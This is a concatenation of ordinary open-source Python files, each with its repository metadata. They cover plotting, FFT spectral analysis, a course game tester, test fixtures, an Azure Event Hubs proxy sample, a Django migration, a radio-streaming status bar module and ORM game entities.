animator_settings.update(kwargs.get('animator_settings', {}))
animation = matplotlib.animation.FuncAnimation(fig, update_fig,
frames=range(start_index, stop_index),
**animator_settings)
return animation
|
{
"content_hash": "604240ec2382d5d7acf92ab461a9ed2f",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 99,
"avg_line_length": 40.8041237113402,
"alnum_prop": 0.596766043456291,
"repo_name": "wtbarnes/synthesizAR",
"id": "d7f14cfe91ff0126b28035953ebc1aed164b50fa",
"size": "3958",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "synthesizAR/visualize/aia.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "168325"
}
],
"symlink_target": ""
}
|
not_found = {"message":"404 Not found"}
|
{
"content_hash": "5f557e014e61b1e1873bbb8ca8609b50",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 39,
"avg_line_length": 39,
"alnum_prop": 0.6666666666666666,
"repo_name": "Itxaka/pyapi-gitlab",
"id": "b132e40e3784e29f405990a074051c11471fd3c5",
"size": "39",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "response_data/__init__.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "105338"
},
{
"name": "Shell",
"bytes": "3331"
}
],
"symlink_target": ""
}
|
"""
Spectral analysis.
"""
import numpy as np
def transform(ts, xs):
"""
Calculate the discrete Fourier transform of a signal.
Parameters:
ts: Times.
xs: Signal values.
Returns:
The transformed frequencies and amplitudes.
Note:
The times must be equally spaced.
"""
    try:
        dt = ts[1] - ts[0]
    except IndexError:
        raise ValueError('At least two time points required.')
freqs = np.fft.fftshift(np.fft.fftfreq(len(xs), d=dt))
# We use the inverse transform here to get the sign convention we need.
spectrum = np.fft.fftshift(np.fft.ifft(xs))
return freqs, spectrum
def find_peak(freqs, amps):
"""
Find the tallest peak (by magnitude) of a complex spectrum.
Parameters:
freqs: Frequencies.
amps: Spectrum values.
Returns:
Index and frequency of tallest peak.
"""
idx = np.argmax(abs(amps))
return idx, freqs[idx]
def interpolate(xs, freqs, amps, freq_window, factor):
"""
Interpolate a discrete Fourier spectrum.
This kind of interpolation is typically performed by zero-padding the
signal, but that is wasteful in space. This function is instead wasteful in
time, applying the discrete Fourier transform formula directly (and not
seeing the usual FFT speedup). However, if only a small region is to be
interpolated, this can be a worthwhile compromise.
Parameters:
xs: Signal values.
freqs: Frequencies.
amps: Spectrum values.
freq_window: Tuple containing the frequencies between which the
interpolation should happen.
factor: Scaling factor by which the density of points is to be increased.
Returns:
The interpolated frequencies and amplitudes.
Note:
The inputs must already be fftshifted, so that freqs is monotonically
increasing.
Note:
The spacing between the freqs doesn't have to be consistent (it's
possible to apply this interpolation several times), but the first and
last values have to be those from the original transform.
"""
assert freqs[0] <= freq_window[0], 'Invalid frequency window: {}, {}.'.format(freqs[0], freq_window[0])
assert freq_window[0] < freq_window[1], 'Invalid frequency window: {}, {}.'.format(freq_window[0], freq_window[1])
assert freq_window[1] <= freqs[-1], 'Invalid frequency window: {}, {}.'.format(freq_window[1], freqs[-1])
# Indices such that we bound freq_window as closely as possible.
idx_min, idx_max = np.argmax(freqs > freq_window[0]) - 1, np.argmin(freqs < freq_window[1])
# Indices before which we insert the new elements.
idxs = np.repeat(np.arange(idx_min, idx_max) + 1, factor - 1)
# Values to be inserted.
new_freqs = freqs[idxs - 1] + np.tile(np.arange(factor - 1) + 1, idx_max - idx_min) * (freqs[idxs] - freqs[idxs - 1]) / factor
new_amps = np.empty_like(new_freqs, dtype=complex)
for i, freq in enumerate(new_freqs):
# Find the fractional frequency index, taking into account the fftshift.
k = (len(xs) - 1) * (freq - freqs[0]) / (freqs[-1] - freqs[0]) - len(xs) // 2
new_amps[i] = sum(xs * np.exp(2j * np.pi * k * np.arange(len(xs)) / len(xs))) / len(xs)
return np.insert(freqs, idxs, new_freqs), np.insert(amps, idxs, new_amps)
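# --- Hypothetical usage sketch (illustration only) ---
# Recover the dominant frequency of a sampled cosine:
#   ts = np.linspace(0.0, 1.0, 128, endpoint=False)
#   xs = np.cos(2.0 * np.pi * 5.0 * ts)
#   freqs, amps = transform(ts, xs)
#   _, peak_freq = find_peak(freqs, amps)
#   # abs(peak_freq) == 5.0 for this sampling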
|
{
"content_hash": "36467d57c8ebc5717098405e5ad1ce00",
"timestamp": "",
"source": "github",
"line_count": 101,
"max_line_length": 130,
"avg_line_length": 33.02970297029703,
"alnum_prop": 0.6522781774580336,
"repo_name": "0/realtimepork",
"id": "f7fe06df02766f5fa1ee4d27eb4b38d6febce50e",
"size": "3336",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "realtimepork/spectrum.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "55699"
}
],
"symlink_target": ""
}
|
import random
from hashlib import md5
TRACE_SOL = 'tests/play.sol'
TEST_SEED = 1337
NUM_TESTS = 1000
def hash(val):
return int(md5(str(val).encode()).hexdigest(), base=16) & 0xffffffff
def make_random_strat():
"""Makes a random pure strategy."""
seed = random.randrange(0, 2 ** 31)
def random_strat(score, opponent_score):
# Save the state of the random generator, so strategy calls don't
# impact dice rolls.
state = random.getstate()
random.seed(hash((score, opponent_score, seed)))
roll = random.randrange(-1, 11)
random.setstate(state)
return roll
return random_strat
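# Note: for a fixed strategy, the roll depends only on
# (score, opponent_score, seed), so repeated calls with the same arguments
# return the same value. For example, with strat = make_random_strat(),
# strat(3, 7) == strat(3, 7) always holds; this determinism is what makes
# the strategy "pure".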
class GameTurn(object):
def __init__(self, score, opponent_score, who, num_rolls):
if who == 0:
self.score0, self.score1 = score, opponent_score
else:
self.score0, self.score1 = opponent_score, score
self.who = who
self.num_rolls = num_rolls
self.rolls = []
self.dice_sides = 6
self.rerolled = False
self.score0_final, self.score1_final = None, None
def is_over(self):
"""Returns True iff this GameTurn should be over."""
return len(self.rolls) >= self.num_rolls
def is_successor(self, other):
"""Returns True if another GameTurn is a plausible successor of this
GameTurn. Used for preventing multiple calls to a strategy function
from messing up the tracer (to a reasonable degree)."""
# In case students call a strategy multiple times per turn.
if self.who == other.who:
return False
# In case students call both strategies regardless of whose turn it is
if self.score0 == other.score0 and self.score1 == other.score1 or \
not self.is_over():
return False
# In case students call a strategy after the game should be over
if max(other.score0, other.score1) >= 100:
return False
return True
def set_successor(self, other):
"""Sets another GameTurn as the successor of this GameTurn."""
        self.score0_final, self.score1_final = other.score0, other.score1
def is_correct(self, sol_hash):
"""Returns True if the hash of this GameTurn matches the solution
hash."""
return hash(self) == sol_hash
@property
def turn_summary(self):
"""Returns a string containing a description of how who rolled how many
dice this turn."""
if self.num_rolls == -1:
return 'Player {0} rolls -1 dice and swaps the dice'.format(self.who)
elif self.num_rolls == 0:
return 'Player {0} rolls 0 dice:'.format(self.who)
elif self.num_rolls == 1:
return 'Player {0} rolls {1} {2}-sided {3}die:'.format(
self.who,
self.num_rolls,
'six' if self.dice_sides == 6 else 'four',
"rerolled " if rerolled else "")
else:
return 'Player {0} rolls {1} {2}-sided {3}dice:'.format(
self.who,
self.num_rolls,
'six' if self.dice_sides == 6 else 'four',
"rerolled " if self.rerolled else "")
@property
def turn_rolls(self):
"""Returns a string containing the dice values rolled this turn."""
return str(self.rolls)[1:-1]
@property
def dice_summary(self):
"""Returns a string containing a summary of the dice values rolled this
turn."""
if len(self.rolls) == 0:
return ''
return 'Dice sum: {0} {1}'.format(
sum(self.rolls),
'(rolled a 1)' if 1 in self.rolls else '')
def __repr__(self):
return str((self.score0, self.score1, self.score0_final,
self.score1_final, self.who, self.num_rolls, self.dice_sides))
def make_traced(s0, s1, six_sided, rerolled, four_sided, rerolled_four):
    """Given the strategy functions of player 0 and player 1, and the
    six-sided, rerolled, and four-sided dice, returns traced versions of
    these functions to be used for the game, as well as a function to
    retrieve the trace."""
trace = [] # List of GameTurns
def make_traced_strategy(strat, player):
def traced_strategy(score, opponent_score):
num_rolls = strat(score, opponent_score)
state = GameTurn(score, opponent_score, player, num_rolls)
if not trace:
trace.append(state)
elif trace[-1].is_successor(state):
trace[-1].set_successor(state)
trace.append(state)
return num_rolls
return traced_strategy
def make_traced_dice(dice, dice_sides, rerolled=False):
def traced_dice():
roll = dice()
if rerolled and roll % 2 == 1:
roll = dice()
if trace:
trace[-1].dice_sides = dice_sides
trace[-1].rerolled = rerolled
trace[-1].rolls.append(roll)
return roll
return traced_dice
def get_trace(score0, score1):
"""Given the final score outcome of the game, returns the trace of the
game."""
trace[-1].score0_final = score0
trace[-1].score1_final = score1
return trace
return make_traced_strategy(s0, 0), \
make_traced_strategy(s1, 1), \
make_traced_dice(six_sided, 6), \
make_traced_dice(rerolled, 6, True), \
make_traced_dice(four_sided, 4, False), \
make_traced_dice(rerolled_four, 4, True), \
get_trace
def play_traced(hog, strat0, strat1):
"""Returns the trace of a hog game, given the HOG module, as well as the
player 0 and 1 strategies for the game."""
reroll, six_sided, four_sided = hog.reroll, hog.six_sided, hog.four_sided
strat0, strat1, traced_six_sided, traced_rerolled, traced_four_sided, \
traced_rerolled_four, get_trace = \
make_traced(strat0, strat1, six_sided, reroll(six_sided), four_sided, reroll(four_sided))
hog.reroll = lambda dice: traced_rerolled if dice == traced_six_sided else traced_four_sided
hog.six_sided = traced_six_sided
hog.four_sided = traced_four_sided
score0, score1 = hog.play(strat0, strat1)
trace = get_trace(score0, score1)
hog.reroll = reroll
hog.six_sided = six_sided
hog.four_sided = four_sided
return trace
def check_play_function(hog):
"""Checks the `play` function of a student's HOG module by running multiple
seeded games, and comparing the results."""
random.seed(TEST_SEED)
sol_traces = load_traces_from_file(TRACE_SOL)
for i in range(NUM_TESTS):
strat0, strat1 = make_random_strat(), make_random_strat()
trace = play_traced(hog, strat0, strat1)
incorrect = compare_trace(trace, sol_traces[i])
if incorrect != -1:
print('Incorrect result after playing {0} game(s):'.format(i + 1))
print_trace(trace, incorrect)
print('Incorrect implementation of game at turn {0}.'.format(incorrect))
print('Please read over the trace to find your error.')
print("\nIf you're having trouble, try looking up the error ID on Piazza,")
print('or making a post with this full trace output.')
print('(error_id: {0})'.format(
hash((trace[incorrect], incorrect, i))))
break
def make_solution_traces(hog):
"""Given a reference HOG solution module, returns the hashed solution
trace."""
random.seed(TEST_SEED)
sol_traces = []
for i in range(NUM_TESTS):
strat0, strat1 = make_random_strat(), make_random_strat()
trace = play_traced(hog, strat0, strat1)
sol_traces.append([hash(state) for state in trace])
return sol_traces
def compare_trace(trace, sol):
"""Compares TRACE with the SOLUTION trace, and returns the turn number
where the two traces differ, or -1 if the traces are the same.
"""
i = 0
while i < min(len(trace), len(sol)):
state, sol_state = trace[i], sol[i]
if not state.is_correct(sol_state):
return i
i += 1
if len(trace) != len(sol):
return len(trace)
return -1
def print_trace(trace, incorrect=None):
"""Prints out the student trace."""
print('-'*64)
print('{0:>10}{1:>8}{2:>8} {3}'.format(
'',
'score0',
'score1',
'Turn Summary'))
print('-'*64)
for i, turn in enumerate(trace):
if incorrect is not None and i != incorrect:
continue
s0_change = turn.score0_final - turn.score0
s1_change = turn.score1_final - turn.score1
print('{0:<10}{1:8}{2:8} {3}'.format(
'Turn {0}:'.format(i),
turn.score0,
turn.score1,
turn.turn_summary))
print('{0:<10}{1:>8}{2:>8} {3}'.format(
'',
'' if s0_change == 0 else '{0:+}'.format(s0_change),
'' if s1_change == 0 else '{0:+}'.format(s1_change),
turn.turn_rolls))
print('{0:<10}{1:8}{2:8} {3}'.format(
'',
turn.score0_final,
turn.score1_final,
turn.dice_summary))
print('-'*64)
print('{0:<15}{1:3}{2:8}'.format(
'Final Score:',
turn.score0_final,
turn.score1_final))
print('-'*64)
def load_traces_from_file(path):
"""Given a file specified by a PATH, returns a trace."""
with open(path) as f:
return eval(f.read())
def write_traces_to_file(path, traces):
"""Given a target file specified by a PATH, and a solution trace, writes
the trace to the file."""
with open(path, 'w') as f:
f.write(str(traces))
|
{
"content_hash": "0c7d01aba7756f60222300a66b5f106d",
"timestamp": "",
"source": "github",
"line_count": 271,
"max_line_length": 97,
"avg_line_length": 36.28044280442804,
"alnum_prop": 0.5814686737184703,
"repo_name": "alienbrittani/cs61a",
"id": "a980d3df1b5ffec10aa26546a6d1ea0979120e57",
"size": "9832",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/proj01_hog/tests/play_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "89354"
}
],
"symlink_target": ""
}
|
from copy import deepcopy
from werkzeug.datastructures import ImmutableMultiDict
class ArticleMetadataFactory(object):
def __init__(self, article_source):
self.article = article_source
def update_article_no_change_to_url_and_doi(self):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
form["doi"] = list(filter(lambda identifier: identifier['type'] == 'doi', self.article["bibjson"]["identifier"]))[0]["id"]
form["fulltext"] = list(filter(lambda link: link['type'] == 'fulltext', self.article["bibjson"]["link"]))[0]["url"]
form["pissn"] = list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
return ImmutableMultiDict(form)
def update_article_fulltext(self, valid):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
form["doi"] = list(filter(lambda identifier: identifier['type'] == 'doi', self.article["bibjson"]["identifier"]))[0]["id"]
if valid:
form["fulltext"] = 'https://www.newarticleurl.co.uk/fulltext'
else:
form["fulltext"] = 'https://www.urltorepeat.com'
form["pissn"] = \
list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = \
list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
return ImmutableMultiDict(form)
def update_article_doi(self, valid):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
if valid:
form["doi"] = '10.1111/article-0'
else:
form["doi"] = '10.1234/article'
form["doi"] = '10.1234/article'
form['pissn'] = list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["fulltext"] = list(filter(lambda link: link['type'] == 'fulltext', self.article["bibjson"]["link"]))[0][
"url"]
return ImmutableMultiDict(form)
ARTICLE_METADATA_VALID_FORM = {
'title': 'New title',
'authors-0-name': 'Agnieszka',
'authors-0-affiliation': 'Cottage Labs',
'authors-1-name': 'John Smith',
'authors-1-affiliation': 'DOAJ',
'abstract': 'This abstract has been edited',
'keywords': 'edited-1,edited-2, edited-3',
'publication_month': '10',
'publication_year': '1987',
#'pissn': '1234-5678',
#'eissn': '9876-5432',
'volume': '1',
'number': '1',
'start': '1',
'end': '1'
}
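# --- Hypothetical usage sketch (illustration only) ---
# Given an article record in the expected bibjson shape:
#   factory = ArticleMetadataFactory(article_source=article)
#   form_data = factory.update_article_fulltext(valid=True)
#   # form_data is an ImmutableMultiDict ready to be fed to the form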
|
{
"content_hash": "1b24e14405e9bbe83ab9f715e1347c88",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 134,
"avg_line_length": 43.921875,
"alnum_prop": 0.607612949128424,
"repo_name": "DOAJ/doaj",
"id": "ade28efc837323b0c65e1a24fdf113a53ece9cd1",
"size": "2811",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "doajtest/unit/resources/articles_metadata_form.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2399"
},
{
"name": "Dockerfile",
"bytes": "59"
},
{
"name": "HTML",
"bytes": "483733"
},
{
"name": "JavaScript",
"bytes": "952971"
},
{
"name": "Jinja",
"bytes": "15292"
},
{
"name": "Python",
"bytes": "3195030"
},
{
"name": "SCSS",
"bytes": "75276"
},
{
"name": "Shell",
"bytes": "28415"
}
],
"symlink_target": ""
}
|
"""Integration tests configuration file."""
import os
from mine.tests.conftest import ( # pylint: disable=unused-import
pytest_configure,
pytest_runtest_setup,
)
ROOT = os.path.dirname(__file__)
FILES = os.path.join(ROOT, "files")
|
{
"content_hash": "19604c6e6505730ea1091d68c3fe1922",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 66,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.7008196721311475,
"repo_name": "jacebrowning/mine",
"id": "102ee236c3e2283c2fb27731bdac3a26f9ff1a50",
"size": "244",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "5744"
},
{
"name": "Python",
"bytes": "110990"
}
],
"symlink_target": ""
}
|
"""
An example to show sending and receiving events behind a proxy.
"""
import os
from azure.eventhub import EventData, EventHubConsumerClient, EventHubProducerClient
CONNECTION_STR = os.environ["EVENT_HUB_CONN_STR"]
EVENTHUB_NAME = os.environ['EVENT_HUB_NAME']
HTTP_PROXY = {
'proxy_hostname': '127.0.0.1', # proxy hostname.
'proxy_port': 3128, # proxy port.
'username': 'admin', # username used for proxy authentication if needed.
'password': '123456' # password used for proxy authentication if needed.
}
def on_event(partition_context, event):
# Put your code here.
print("received event from partition: {}.".format(partition_context.partition_id))
print(event)
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str=CONNECTION_STR, consumer_group='$Default', eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)
producer_client = EventHubProducerClient.from_connection_string(
conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)
with producer_client:
event_data_batch = producer_client.create_batch(max_size_in_bytes=10000)
while True:
try:
event_data_batch.add(EventData('Message inside EventBatchData'))
except ValueError:
# EventDataBatch object reaches max_size.
# New EventDataBatch object can be created here to send more data.
break
producer_client.send_batch(event_data_batch)
print('Finished sending.')
with consumer_client:
consumer_client.receive(on_event=on_event)
print('Finished receiving.')
|
{
"content_hash": "e8031b88849b1bbfe66e4009eb245e52",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 107,
"avg_line_length": 36.15909090909091,
"alnum_prop": 0.7146448774355751,
"repo_name": "Azure/azure-sdk-for-python",
"id": "f2f1eecc35825f0b3eebbb080219f913e1e267af",
"size": "1960",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/eventhub/azure-eventhub/samples/sync_samples/proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import json
from django.db import models, migrations
def show_facility_code_field(apps, schema_editor):
"""Create a facility code Field for each active org."""
Org = apps.get_model('orgs', 'Org')
DataField = apps.get_model('contacts', 'DataField')
for org in Org.objects.filter(is_active=True):
# Must manually load config; get_config is not available.
config = json.loads(org.config) if org.config else {}
DataField.objects.create(
org=org,
key=config.pop("facility_code_field", "facility_code"),
value_type="T", # Text
show_on_tracpro=True,
)
# Save the config without `facility_code_field`, which is no longer
# in use.
org.config = json.dumps(config) if config else None
org.save()
class Migration(migrations.Migration):
dependencies = [
('contacts', '0008_add_contactfield_model'),
]
operations = [
migrations.RunPython(
show_facility_code_field, migrations.RunPython.noop),
migrations.RemoveField(
model_name='contact',
name='facility_code',
),
]
|
{
"content_hash": "f42effe51170732c363c712f39db0c07",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 75,
"avg_line_length": 28.952380952380953,
"alnum_prop": 0.6101973684210527,
"repo_name": "xkmato/tracpro",
"id": "b8b7af4644737badc1235e9fc3dc412893fd54a7",
"size": "1240",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tracpro/contacts/migrations/0009_show_facility_code_field.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27726"
},
{
"name": "CoffeeScript",
"bytes": "10296"
},
{
"name": "HTML",
"bytes": "107840"
},
{
"name": "JavaScript",
"bytes": "25237"
},
{
"name": "Makefile",
"bytes": "1962"
},
{
"name": "Python",
"bytes": "406848"
},
{
"name": "SaltStack",
"bytes": "19566"
},
{
"name": "Scheme",
"bytes": "29815"
},
{
"name": "Shell",
"bytes": "205447"
}
],
"symlink_target": ""
}
|
import logging
import shutil
import threading
import os
import xml.etree.ElementTree as etree
from datetime import datetime
import requests
import vlc
from dateutil import parser
from dateutil.tz import tzutc
from i3pystatus import IntervalModule
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.util import internet, require
class State:
PLAYING = 1
PAUSED = 2
STOPPED = 3
class ABCRadio(IntervalModule):
"""
Streams ABC Australia radio - https://radio.abc.net.au/. Currently uses VLC to do the
actual streaming.
Requires the PyPI packages `python-vlc`, `python-dateutil` and `requests`. Also requires VLC
- https://www.videolan.org/vlc/index.html
.. rubric:: Available formatters
* `{station}` — Current station
* `{title}` — Title of current show
* `{url}` — Show's URL
* `{remaining}` — Time left for current show
* `{player_state}` — Unicode icons representing play, pause and stop
"""
settings = (
("format", "format string for when the player is inactive"),
("format_playing", "format string for when the player is playing"),
("target_stations", "list of station ids to select from. Station ids can be obtained "
"from the following XML - http://www.abc.net.au/radio/data/stations_apps_v3.xml. "
"If the list is empty, all stations will be accessible."),
)
format = "{station} {title} {player_state}"
format_playing = "{station} {title} {remaining} {player_state}"
on_leftclick = 'toggle_play'
on_upscroll = ['cycle_stations', 1]
on_downscroll = ['cycle_stations', -1]
on_doubleleftclick = 'display_notification'
interval = 1
# Destroy the player after this many seconds of inactivity
PLAYER_LIFETIME = 5
show_info = {}
player = None
station_info = None
station_id = None
stations = None
prev_title = None
prev_station = None
target_stations = []
end = None
start = None
destroy_timer = None
cycle_lock = threading.Lock()
player_icons = {
State.PAUSED: "▷",
State.PLAYING: "▶",
State.STOPPED: "◾",
}
def init(self):
self.station_info = ABCStationInfo()
@require(internet)
def run(self):
if self.station_id is None:
self.stations = self.station_info.get_stations()
# Select the first station in the list
self.cycle_stations(1)
if self.end and self.end <= datetime.now(tz=tzutc()):
self.update_show_info()
format_dict = self.show_info.copy()
format_dict['player_state'] = self.get_player_state()
format_dict['remaining'] = self.get_remaining()
format_template = self.format_playing if self.player else self.format
self.output = {
"full_text": format_template.format(**format_dict)
}
def update_show_info(self):
log.debug("Updating: show_info - %s" % datetime.now())
        self.show_info = dict.fromkeys(
            ('title', 'url', 'start', 'end', 'duration', 'stream', 'remaining',
             'station', 'description', 'short_synopsis'), '')
self.show_info.update(self.stations[self.station_id])
self.show_info.update(self.station_info.currently_playing(self.station_id))
# Show a notification when the show changes if the user is actively listening.
should_show = self.prev_station == self.show_info['station'] and self.prev_title != self.show_info[
'title'] and self.player
if should_show:
self.display_notification()
self.prev_title = self.show_info['title']
self.prev_station = self.show_info['station']
self.end = self.show_info['end'] if self.show_info['end'] else None
self.start = self.show_info['start'] if self.show_info['start'] else None
def get_player_state(self):
if self.player:
return self.player_icons[self.player.player_state]
else:
return self.player_icons[State.STOPPED]
def get_remaining(self):
if self.end and self.end > datetime.now(tz=tzutc()):
return str(self.end - datetime.now(tz=tzutc())).split(".")[0]
return ''
def cycle_stations(self, increment=1):
with self.cycle_lock:
target_array = self.target_stations if len(self.target_stations) > 0 else list(self.stations.keys())
if self.station_id in target_array:
next_index = (target_array.index(self.station_id) + increment) % len(target_array)
self.station_id = target_array[next_index]
else:
self.station_id = target_array[0]
log.debug("Cycle to: {}".format(self.station_id))
if self.player:
current_state = self.player.player_state
self.player.stop()
else:
current_state = State.STOPPED
self.update_show_info()
if self.player:
self.player.load_stream(self.show_info['stream'])
self.player.set_state(current_state)
def display_notification(self):
if self.show_info:
station, title, synopsis = self.show_info['station'], self.show_info['title'], self.show_info[
'short_synopsis']
title = "{} - {}".format(station, title)
def get_image():
image_link = self.show_info.get('image_link', None)
if image_link:
try:
image_path = "/tmp/{}.icon".format(station)
if not os.path.isfile(image_path):
response = requests.get(image_link, stream=True)
with open(image_path, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
return image_path
                    except Exception:
                        # The icon is optional; ignore download failures.
                        pass
DesktopNotification(title=title, body=synopsis, icon=get_image()).display()
log.info("Displayed notification")
def toggle_play(self):
if not self.player:
self.init_player()
if self.player.is_playing():
self.player.pause()
self.destroy_timer = threading.Timer(self.PLAYER_LIFETIME, self.destroy)
self.destroy_timer.start()
else:
if self.destroy_timer:
self.destroy_timer.cancel()
self.destroy_timer = None
self.player.play()
self.run()
def init_player(self):
if self.show_info:
self.player = VLCPlayer()
log.info("Created player: {}".format(id(self.player)))
if not self.player.stream_loaded():
log.info("Loading stream: {}".format(self.show_info['stream']))
self.player.load_stream(self.show_info['stream'])
if not self.player.is_alive():
self.player.start()
def destroy(self):
log.debug("Destroying player: {}".format(id(self.player)))
if self.player:
self.player.destroy()
self.player = None
class ABCStationInfo:
PLAYING_URL = "https://program.abcradio.net.au/api/v1/programitems/{}/live.json?include=now"
def currently_playing(self, station_id):
station_info = self._get(self.PLAYING_URL.format(station_id)).json()
try:
return dict(
title=station_info['now']['program']['title'],
url=station_info['now']['primary_webpage']['url'],
start=parser.parse(station_info['now']['live'][0]['start']),
end=parser.parse(station_info['now']['live'][0]['end']),
duration=station_info['now']['live'][0]['duration_seconds'],
short_synopsis=station_info['now']['short_synopsis'],
stream=sorted(station_info['now']['live'][0]['outlets'][0]['audio_streams'], key=lambda x: x['type'])[0]['url']
)
except (KeyError, IndexError):
return {}
def get_stations(self):
stations = dict()
station_xml = etree.fromstring(self._get('http://www.abc.net.au/radio/data/stations_apps_v3.xml').content)
for element in station_xml:
attrib = element.attrib
if attrib["showInAndroidApp"] == 'true':
stations[attrib['id']] = dict(
id=attrib['id'],
station=attrib['name'],
description=attrib.get('description', None),
link=attrib.get('linkUrl', None),
image_link=attrib.get('WEBimageUrl', None),
stream=attrib.get('hlsStreamUrl', None),
)
return stations
def _get(self, url):
result = requests.get(url=url)
if result.status_code not in range(200, 300):
result.raise_for_status()
return result
log = logging.getLogger(__name__)
class VLCPlayer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.idle = threading.Event()
self.die = threading.Event()
self.instance = vlc.Instance()
self.player_state = State.STOPPED
self.player = self.instance.media_player_new()
def run(self):
states = {
State.STOPPED: self.player.stop,
State.PLAYING: self.player.play,
State.PAUSED: self.player.pause,
}
while not self.die.is_set():
self.idle.wait()
states[self.player_state]()
self.idle.clear()
def load_stream(self, url):
self.player.set_media(self.instance.media_new(url))
def stream_loaded(self):
return self.player.get_media() is not None
def play(self):
self.set_state(State.PLAYING)
def pause(self):
self.set_state(State.PAUSED)
def stop(self):
self.set_state(State.STOPPED)
def destroy(self):
self.die.set()
self.idle.set()
self.player.stop()
self.player.release()
def set_state(self, state):
log.info("{} -> {}".format(self.player_state, state))
self.player_state = state
self.idle.set()
def is_playing(self):
return self.player.is_playing()
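# --- Hypothetical i3pystatus configuration sketch (not part of this module) ---
#   from i3pystatus import Status
#   status = Status()
#   status.register("abc_radio", target_stations=["triplej", "classic"])
#   status.run()
# The station ids above are placeholders; real ids come from the stations XML
# referenced in the ABCRadio docstring.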
|
{
"content_hash": "9735854389705d773dad3db3e968c064",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 127,
"avg_line_length": 34.92642140468227,
"alnum_prop": 0.5746433017332184,
"repo_name": "m45t3r/i3pystatus",
"id": "8ee558965198f749a6eafd1e21a8dc0145cf0058",
"size": "10459",
"binary": false,
"copies": "3",
"ref": "refs/heads/myfork",
"path": "i3pystatus/abc_radio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "517451"
},
{
"name": "Shell",
"bytes": "825"
}
],
"symlink_target": ""
}
|
from datetime import datetime
from pony.orm.core import PrimaryKey, Required, Optional, Set, Discriminator, sql_debug
from grepopla.model.database import db
from grepopla.settings import PRODUCTION
class GameObject(db.Entity):
_table_ = "game_object"
game_object_type = Discriminator(str)
id = PrimaryKey(int, auto=True)
game = Required("Game")
player = Optional("Player")
action = Optional(unicode)
size = Required(int)
class Player(db.Entity):
id = PrimaryKey(int, auto=True)
nick = Required(unicode, lazy=False)
color = Required(unicode)
commands = Set("Command")
games = Set("Game")
game_objects = Set(GameObject)
ip_address = Required(unicode)
class Game(db.Entity):
id = PrimaryKey(int, auto=True)
commands = Set("Command")
players = Set(Player)
objects = Set(GameObject)
created_at = Optional(datetime)
launched_at = Optional(datetime)
closed_at = Optional(datetime)
class Ship(GameObject):
pass
class Planet(GameObject):
x = Required(int)
y = Required(int)
is_free = Optional(int)
class Command(db.Entity):
_table_ = "log"
id = PrimaryKey(int, auto=True)
received = Required(datetime)
game = Required(Game)
player = Optional(Player)
sql_debug(not PRODUCTION)
db.generate_mapping(create_tables=True, check_tables=True)
db.check_tables()
|
{
"content_hash": "088a848f74d8814b51385a609e20f174",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 87,
"avg_line_length": 23.372881355932204,
"alnum_prop": 0.6845540246555475,
"repo_name": "spseol/grepopla-server",
"id": "a2334ffa0277c5efac0bf026b123912e31d6651f",
"size": "1379",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "grepopla/model/entity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
